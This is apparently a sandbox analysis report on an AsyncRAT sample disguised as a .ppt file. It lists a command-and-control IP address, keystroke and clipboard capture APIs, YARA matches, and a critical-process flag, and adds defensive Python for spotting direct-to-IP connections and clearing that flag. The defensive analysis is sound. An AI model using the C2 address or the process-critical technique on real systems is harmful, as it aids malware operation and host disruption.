          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknownTCP traffic detected without corresponding DNS query: 195.26.255.81
          Source: unknown | TCP traffic detected without corresponding DNS query: 195.26.255.81 (reported 29 times)
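
The "TCP traffic detected without corresponding DNS query" signature above is a correlation between the sandbox's DNS answers and its TCP connection records: a process that opens a socket to a public address nobody resolved is using a hard-coded C2 endpoint. The following is an added example of that check, not code from the Joe Sandbox report; it works over Zeek-style dns.log / conn.log tuples that are constructed inline. The record layout, the 24-hour lookback, the "globally routable only" filter and the resolved address 93.184.216.34 are this example's assumptions; 195.26.255.81 is the address named in the report.

```python
"""Flag TCP connections to public IPs that no DNS answer named beforehand.

Added example, not code from the Joe Sandbox report. Records are constructed
to resemble Zeek dns.log / conn.log tuples; the field layout and the 24-hour
lookback are this example's assumptions.
"""
import ipaddress
from collections import defaultdict
from typing import Iterable, List, NamedTuple


class DnsAnswer(NamedTuple):
    ts: float      # epoch seconds the answer was observed
    query: str     # name that was asked for
    answer: str    # A/AAAA payload; CNAME/TXT payloads are ignored


class TcpConn(NamedTuple):
    ts: float
    src: str
    dst: str
    dst_port: int


LOOKBACK_SECONDS = 24 * 3600   # honour an answer for a day (assumed TTL ceiling)


def _needs_dns(ip_text: str) -> bool:
    """Only globally routable destinations are expected to follow a lookup."""
    return ipaddress.ip_address(ip_text).is_global


def connections_without_dns(dns: Iterable[DnsAnswer], conns: Iterable[TcpConn]) -> List[TcpConn]:
    """Return connections whose destination was not resolved in the lookback window.

    A connection made *before* the answer that names its IP is still flagged:
    the process knew the address before asking, the hard-coded-C2 pattern.
    """
    answered_at = defaultdict(list)           # ip -> timestamps it was returned
    for rec in dns:
        try:
            ip = str(ipaddress.ip_address(rec.answer))
        except ValueError:
            continue                           # not an address (CNAME, TXT, ...)
        answered_at[ip].append(rec.ts)

    flagged = []
    for c in sorted(conns, key=lambda c: c.ts):
        if not _needs_dns(c.dst):
            continue                           # LAN, loopback, multicast: no DNS expected
        window = [t for t in answered_at.get(c.dst, ()) if c.ts - LOOKBACK_SECONDS <= t <= c.ts]
        if not window:
            flagged.append(c)
    return flagged


# Constructed sample: 195.26.255.81 is the address from the report above; the
# resolved host 93.184.216.34 and all timestamps are invented for the example.
SAMPLE_DNS = [
    DnsAnswer(1700000000.0, "example.com", "93.184.216.34"),
    DnsAnswer(1700000100.0, "ctldl.windowsupdate.com", "cdn.example.net"),  # CNAME, skipped
]
SAMPLE_CONNS = [
    TcpConn(1699999999.0, "10.0.0.5", "93.184.216.34", 443),  # before the answer: flag
    TcpConn(1700000001.0, "10.0.0.5", "93.184.216.34", 443),  # after the answer: ok
    TcpConn(1700000005.0, "10.0.0.5", "195.26.255.81", 443),  # never resolved: flag
    TcpConn(1700000006.0, "10.0.0.5", "10.0.0.1", 53),        # LAN resolver: skip
]


def sample_hits():
    """(dst, port) pairs flagged in the constructed sample."""
    return [(c.dst, c.dst_port) for c in connections_without_dns(SAMPLE_DNS, SAMPLE_CONNS)]


if __name__ == "__main__":
    for dst, port in sample_hits():
        print(f"direct-to-IP connection: {dst}:{port}")
```

Treat a hit as a hunting lead rather than a verdict: addresses learned through an HTTP redirect, a hard-coded CDN list, or a cache populated before capture started also arrive without a visible lookup. What makes this sample's hit decisive is the owner of the socket, a RegSvcs.exe copy running from %TEMP% rather than from the .NET framework directory.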
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_0076D7A1 InternetReadFile,SetEvent,GetLastError,SetEvent
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1828917683.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.dr | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1828917683.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1828917683.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1828917683.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1828917683.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.dr | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
          Source: RegSvcs.exe, 0000000C.00000002.4091230797.000000000188B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
          Source: RegSvcs.exe, 0000000C.00000002.4091230797.000000000188B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab%6f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1828917683.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.dr | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1828917683.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.dr | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1828917683.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1828917683.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr606
          Source: cipkucw.ppt.exe, 00000011.00000003.2160334326.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2160509508.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2139352487.0000000000D86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.microO
          Source: RegSvcs.exe, 0000000C.00000002.4092763243.0000000003721000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1828917683.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1828917683.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000000.1778450819.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000002.2022650449.0000000001095000.00000002.00000001.01000000.0000000E.sdmp, cipkucw.ppt.exe, 00000011.00000002.2169095460.0000000001095000.00000002.00000001.01000000.0000000E.sdmp, cipkucw.ppt.exe, 00000013.00000000.2151242199.0000000001095000.00000002.00000001.01000000.0000000E.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1828917683.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.dr | String found in binary or memory: https://www.autoitscript.com/autoit3/
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1828917683.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.dr | String found in binary or memory: https://www.globalsign.com/repository/0

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          Source: Yara match | File source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 16.2.RegSvcs.exe.760000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000011.00000003.2138978432.0000000003626000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000003.2001032731.000000000173E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000003.2000519761.000000000174E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.4092763243.0000000003721000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000003.1874054223.000000000361A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000003.2219656121.0000000001845000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000003.2000805264.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000003.1873750371.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000003.2000748696.000000000174E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000003.1873380040.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000010.00000002.2048370610.0000000000762000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000003.2139352487.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000003.2219758241.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000003.2218782677.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000003.2138543622.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000003.2219549632.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000003.2138854777.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000003.1874482943.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000003.2001114393.0000000001628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000003.2219993576.0000000001854000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: cipkucw.ppt PID: 1420, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2800, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: cipkucw.ppt.exe PID: 3484, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2368, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: cipkucw.ppt.exe PID: 3732, type: MEMORYSTR
          Source: Yara match | File source: Process Memory Space: cipkucw.ppt.exe PID: 5780, type: MEMORYSTR
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_0076F45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_0076F6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Code function: 15_2_0103F6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_0075A54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_00789ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Code function: 15_2_01059ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

          Operating System Destruction

          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Process information set: 01 00 00 00
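
The four bytes above are the little-endian ULONG value 1 written through the process information class ProcessBreakOnTermination (PROCESSINFOCLASS 29), the "BreakOnTermination flag" named in the detection summary: with it set, RegSvcs.exe is a critical process and terminating it bugchecks the host, which is why the report files the behaviour under "Operating System Destruction". The block below is an added example, not code from the report or from the sample: a Python ctypes utility that queries the flag on a PID and clears it so an analyst can end the process without crashing the machine. It is Windows-only at run time (the module still imports elsewhere so the byte decoder can be exercised), needs an elevated shell because the kernel checks SeDebugPrivilege for this class, and its command-line interface and error texts are this example's choices.

```python
"""Query and clear ProcessBreakOnTermination, the flag that makes a process
'critical' so that terminating it bugchecks Windows. Added example (not code
from the report); Windows-only at run time, importable anywhere."""
import ctypes
import struct
import sys

PROCESS_BREAK_ON_TERMINATION = 29        # PROCESSINFOCLASS value
PROCESS_QUERY_INFORMATION, PROCESS_SET_INFORMATION = 0x0400, 0x0200
TOKEN_ADJUST_PRIVILEGES, TOKEN_QUERY, SE_PRIVILEGE_ENABLED = 0x0020, 0x0008, 0x0002


def decode_process_information(raw) -> int:
    """Decode the ULONG the report prints as '01 00 00 00' (hex text or 4 bytes)."""
    if isinstance(raw, str):
        raw = bytes(int(tok, 16) for tok in raw.split())
    if len(raw) != 4:
        raise ValueError("ProcessBreakOnTermination takes a 4-byte ULONG")
    return struct.unpack("<I", raw)[0]


def _win():
    """Bind the Windows APIs lazily; explicit argtypes keep 64-bit HANDLEs intact."""
    if sys.platform != "win32":
        raise OSError("requires Windows")
    import ctypes.wintypes as wt
    ntdll, k32 = ctypes.WinDLL("ntdll"), ctypes.WinDLL("kernel32", use_last_error=True)
    adv = ctypes.WinDLL("advapi32", use_last_error=True)
    ntdll.NtQueryInformationProcess.argtypes = [wt.HANDLE, ctypes.c_int, ctypes.c_void_p, wt.ULONG, ctypes.POINTER(wt.ULONG)]
    ntdll.NtSetInformationProcess.argtypes = [wt.HANDLE, ctypes.c_int, ctypes.c_void_p, wt.ULONG]
    k32.OpenProcess.restype, k32.OpenProcess.argtypes = wt.HANDLE, [wt.DWORD, wt.BOOL, wt.DWORD]
    k32.GetCurrentProcess.restype, k32.CloseHandle.argtypes = wt.HANDLE, [wt.HANDLE]
    adv.OpenProcessToken.argtypes = [wt.HANDLE, wt.DWORD, ctypes.POINTER(wt.HANDLE)]
    adv.LookupPrivilegeValueW.argtypes = [wt.LPCWSTR, wt.LPCWSTR, ctypes.c_void_p]
    adv.AdjustTokenPrivileges.argtypes = [wt.HANDLE, wt.BOOL, ctypes.c_void_p, wt.DWORD, ctypes.c_void_p, ctypes.c_void_p]
    return wt, ntdll, k32, adv


def enable_debug_privilege():
    """Enable SeDebugPrivilege in our token; the kernel requires it for this class."""
    wt, _, k32, adv = _win()

    class LUID(ctypes.Structure):
        _fields_ = [("LowPart", wt.DWORD), ("HighPart", wt.LONG)]

    class LUID_AND_ATTRIBUTES(ctypes.Structure):
        _fields_ = [("Luid", LUID), ("Attributes", wt.DWORD)]

    class TOKEN_PRIVILEGES(ctypes.Structure):
        _fields_ = [("PrivilegeCount", wt.DWORD), ("Privileges", LUID_AND_ATTRIBUTES * 1)]

    token = wt.HANDLE()
    if not adv.OpenProcessToken(k32.GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, ctypes.byref(token)):
        raise ctypes.WinError(ctypes.get_last_error())
    tp = TOKEN_PRIVILEGES(PrivilegeCount=1)
    if not adv.LookupPrivilegeValueW(None, "SeDebugPrivilege", ctypes.byref(tp.Privileges[0].Luid)):
        raise ctypes.WinError(ctypes.get_last_error())
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED
    ok = adv.AdjustTokenPrivileges(token, False, ctypes.byref(tp), 0, None, None)
    err = ctypes.get_last_error()
    k32.CloseHandle(token)
    if not ok or err == 1300:   # ERROR_NOT_ALL_ASSIGNED: the shell is not elevated
        raise PermissionError("SeDebugPrivilege not held; run from an elevated shell")


def is_critical(pid: int) -> bool:
    """True when `pid` has ProcessBreakOnTermination set (value 1)."""
    wt, ntdll, k32, _ = _win()
    h = k32.OpenProcess(PROCESS_QUERY_INFORMATION, False, pid)
    if not h:
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        value = wt.ULONG(0)
        status = ntdll.NtQueryInformationProcess(h, PROCESS_BREAK_ON_TERMINATION, ctypes.byref(value), ctypes.sizeof(value), None)
    finally:
        k32.CloseHandle(h)
    if status != 0:
        raise OSError(f"NtQueryInformationProcess: NTSTATUS 0x{status & 0xFFFFFFFF:08X}")
    return decode_process_information(bytes(value)) == 1


def clear_break_on_termination(pid: int) -> None:
    """Clear the flag so the process can be killed without bugchecking the host."""
    wt, ntdll, k32, _ = _win()
    enable_debug_privilege()
    h = k32.OpenProcess(PROCESS_SET_INFORMATION, False, pid)
    if not h:
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        zero = wt.ULONG(0)
        status = ntdll.NtSetInformationProcess(h, PROCESS_BREAK_ON_TERMINATION, ctypes.byref(zero), ctypes.sizeof(zero))
    finally:
        k32.CloseHandle(h)
    if status != 0:
        raise OSError(f"NtSetInformationProcess: NTSTATUS 0x{status & 0xFFFFFFFF:08X}")


if __name__ == "__main__":   # usage: critical.py <pid>  |  critical.py --clear <pid>
    if sys.argv[1] == "--clear":
        clear_break_on_termination(int(sys.argv[2]))
    else:
        print(f"PID {sys.argv[1]} critical: {is_critical(int(sys.argv[1]))}")
```

Order of operations matters during containment: clear the flag first, then terminate. Killing the implant while the flag is set crashes the host and loses every volatile artefact (sockets, injected regions, the decrypted AsyncRAT configuration) that the memory matches above came from. System processes such as smss.exe, csrss.exe and wininit.exe legitimately report the flag as set; the anomaly is a critical process whose image lives under a user-writable path like the %TEMP%\RegSvcs.exe seen here.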

          System Summary

          Source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
          Source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
          Source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 16.2.RegSvcs.exe.760000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 16.2.RegSvcs.exe.760000.0.unpack, type: UNPACKEDPE | Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
          Source: 16.2.RegSvcs.exe.760000.0.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
          Source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
